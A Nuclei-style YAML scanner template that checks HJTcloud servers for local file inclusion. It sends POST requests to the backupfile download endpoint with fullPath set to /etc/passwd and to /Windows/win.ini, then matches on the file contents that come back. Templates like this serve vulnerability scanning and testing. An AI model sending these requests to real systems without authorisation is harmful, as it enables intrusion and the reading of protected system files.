id: hjtcloud-arbitrary-file-read

info:
  name: HJTcloud - Local File Inclusion
  author: pikpikcu
  severity: high
  description: HJTcloud is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: hjtcloud,lfi

requests:
  - raw:
      - |
        POST /fileDownload?action=downloadBackupFile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        fullPath=/etc/passwd

      - |
        POST /fileDownload?action=downloadBackupFile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        fullPath=/Windows/win.ini

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
          - "bit app support"
        condition: or

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
